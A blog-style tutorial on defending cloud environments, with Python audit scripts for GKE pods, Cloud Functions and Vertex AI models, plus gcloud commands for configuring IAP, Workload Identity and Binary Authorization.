Let's look at some cutting-edge attack vectors and how to defend against them.
Container Escape Techniques in Managed Services
Managed Kubernetes services (GKE, EKS, AKS) present unique security challenges. I've found these vulnerabilities particularly concerning:
- Host path volume mounts allowing container escape
- Privileged containers with excessive capabilities
- Node metadata API access enabling credential theft
This GKE security script helps identify potential container escape paths:
from kubernetes import client, config

def check_gke_container_security():
    config.load_kube_config()
    v1 = client.CoreV1Api()
    pods = v1.list_pod_for_all_namespaces(watch=False)
    for pod in pods.items:
        # Check for hostPath volumes (a classic container-escape vector)
        for volume in (pod.spec.volumes or []):
            if volume.host_path:
                print(f"WARNING: Pod {pod.metadata.name} has hostPath volume: {volume.host_path.path}")
        # Check for privileged containers
        for container in pod.spec.containers:
            if container.security_context and container.security_context.privileged:
                print(f"WARNING: Pod {pod.metadata.name} has privileged container: {container.name}")

if __name__ == "__main__":
    check_gke_container_security()
Serverless Security Challenges
Serverless computing (Cloud Functions, Lambda, Azure Functions) introduces new attack vectors:
- Function event data injection leading to code execution
- Dependencies with vulnerabilities in function packages
- Insecure temporary storage in /tmp directories
Here's a GCP Cloud Functions security review script:
from google.cloud import functions_v1

def audit_cloud_functions(project_id):
    client = functions_v1.CloudFunctionsServiceClient()
    parent = f"projects/{project_id}/locations/-"
    functions = client.list_functions(request={"parent": parent})
    for function in functions:
        # Check for public invocation via the function's IAM policy
        policy = client.get_iam_policy(request={"resource": function.name})
        for binding in policy.bindings:
            if "allUsers" in binding.members:
                print(f"WARNING: Function {function.name} is publicly invocable")
        # Check for the overly broad default service account
        if function.service_account_email == f"{project_id}@appspot.gserviceaccount.com":
            print(f"WARNING: Function {function.name} uses default service account")
    # Additional checks specific to your environment
Zero-Trust Cloud Architecture
At the expert level, our goal is to implement zero-trust principles across cloud environments.
BeyondCorp for GCP Resources
Google's BeyondCorp approach to zero-trust is powerful when properly implemented:
# Configure IAP for web applications
gcloud compute backend-services update BACKEND_SERVICE \
--iap=enabled,oauth2-client-id=CLIENT_ID,oauth2-client-secret=CLIENT_SECRET
This ensures that access to applications is controlled by identity, not network location, a fundamental shift from traditional perimeter-based security.
Securing Service-to-Service Communication with Workload Identity
For GCP microservices, Workload Identity provides zero-trust authentication:
# Configure a GKE cluster with Workload Identity
gcloud container clusters update CLUSTER_NAME \
--workload-pool=PROJECT_ID.svc.id.goog
# Then create a mapping between K8s service accounts and GCP service accounts
kubectl annotate serviceaccount KSA_NAME \
iam.gke.io/gcp-service-account=GSA_NAME@PROJECT_ID.iam.gserviceaccount.com
This eliminates the need for service account keys, removing a major attack vector I've exploited countless times.
Binary Authorization for Container Security
GCP's Binary Authorization provides cryptographic verification of container images:
# Enable Binary Authorization for GKE
gcloud container clusters update CLUSTER_NAME \
--binauthz-evaluation-mode=PROJECT_DEFAULT
# Create an attestor
gcloud container binauthz attestors create secure-build-attestor \
--attestation-authority-note=projects/PROJECT_ID/notes/secure-build-note \
--attestation-authority-note-project=PROJECT_ID
This ensures only approved, signed container images can be deployed, mitigating supply chain attacks.
Cloud Security at Scale: The Enterprise Perspective
After working with Fortune 500 companies on their cloud security, I've developed some key insights for securing cloud environments at scale.
Infrastructure as Code Security Scanning
Catching misconfigurations before deployment is far more effective than remediation:
# Example using Checkov for Terraform scanning
pip install checkov
checkov -d /path/to/terraform/code --framework terraform
# For Kubernetes manifests
checkov -d /path/to/kubernetes/manifests --framework kubernetes
This identifies security issues before they make it to production, a critical shift-left approach.
Automated Remediation Workflows
For large-scale environments, automation is key:
from google.cloud import securitycenter_v1

def remediate_public_buckets(organization_id):
    client = securitycenter_v1.SecurityCenterClient()
    # Findings live under sources; "-" queries across all sources in the org
    parent = f"organizations/{organization_id}/sources/-"
    findings = client.list_findings(
        request={
            "parent": parent,
            "filter": 'category="PUBLIC_BUCKET_ACL"'
        }
    )
    for result in findings:
        # list_findings yields ListFindingsResult objects wrapping each finding
        bucket_name = result.finding.resource_name.split('/')[-1]
        # Remediate by removing public access
        print(f"Remediating public access for bucket: {bucket_name}")
        # Implement actual remediation code here (see the sketch below)
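For the remediation itself, here's a minimal sketch using the google-cloud-storage client; enforcing public access prevention is a blunt instrument, so confirm the bucket genuinely shouldn't be public first:
from google.cloud import storage

def remove_public_access(bucket_name):
    client = storage.Client()
    bucket = client.get_bucket(bucket_name)
    # Enforce public access prevention, overriding public ACLs and IAM grants
    bucket.iam_configuration.public_access_prevention = "enforced"
    bucket.patch()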
Security Posture Management Dashboard
For executive visibility, I've built custom security dashboards:
def generate_cloud_security_posture_metrics():
    metrics = {
        'aws': {
            'critical_findings': 0,
            'high_findings': 0,
            'compliance_percentage': 0,
        },
        'azure': {
            'critical_findings': 0,
            'high_findings': 0,
            'compliance_percentage': 0,
        },
        'gcp': {
            'critical_findings': 0,
            'high_findings': 0,
            'compliance_percentage': 0,
        }
    }
    # Populate with actual data from your cloud environments
    # Implementation will depend on your specific environment
    return metrics
Future Cloud Security Trends
As I look to the future of cloud security, these are the areas I'm focusing on:
Quantum-Resistant Cryptography in the Cloud
With quantum computing advancing rapidly, cryptographic vulnerabilities loom:
# Check for quantum-vulnerable algorithms in GCP SSL certificates
gcloud compute ssl-certificates list --format="table(name,type,creationTimestamp,managed.status)"
GCP, AWS, and Azure are all introducing post-quantum cryptography options, but it's crucial to proactively identify and replace vulnerable implementations.
AI/ML Security in Cloud Platforms
Machine learning workflows introduce unique security challenges:
- Model poisoning through manipulated training data
- Inference attacks extracting sensitive information
- API-based model extraction stealing intellectual property
For GCP AI Platform security, I recommend:
from google.cloud import aiplatform_v1

def audit_vertex_ai_security(project_id, location):
    # Vertex AI endpoints are regional, so point the client at the right region
    client = aiplatform_v1.ModelServiceClient(
        client_options={"api_endpoint": f"{location}-aiplatform.googleapis.com"}
    )
    # List all models
    parent = f"projects/{project_id}/locations/{location}"
    models = client.list_models(request={"parent": parent})
    for model in models:
        # Check for customer-managed encryption keys
        if model.encryption_spec.kms_key_name == "":
            print(f"WARNING: Model {model.display_name} is not using CMEK")
        # Check for mutable container image tags
        if "latest" in model.container_spec.image_uri:
            print(f"WARNING: Model {model.display_name} uses 'latest' tag for container image")
Serverless-to-Serverless Attacks
The emerging trend of serverless-to-serverless attacks requires new detection approaches:
def detect_serverless_chain_attacks(project_id):
    # Implementation would involve analyzing Cloud Function invocation patterns,
    # identifying unusual service account usage, and detecting abnormal data access
    pass
Key Takeaways and Defensive Strategy
After years of penetration testing cloud environments, here's my strategic advice:
- Implement guardrails, not gates: Use organization policies and service control policies to enforce security standards without hindering innovation
- Automate everything: Manual security processes cannot scale with cloud adoption
- Focus on identity first: Identity is the primary security perimeter in modern cloud environments
- Prioritize visibility: You can't secure what you can't see; comprehensive asset inventory is essential
- Shift left: Integrate security into development pipelines rather than bolting it on afterward
Remember: in cloud security, what you don't know absolutely will hurt you. Stay curious, keep learning, and always assume there's another misconfiguration waiting to be found.
Until next time,
Rasoul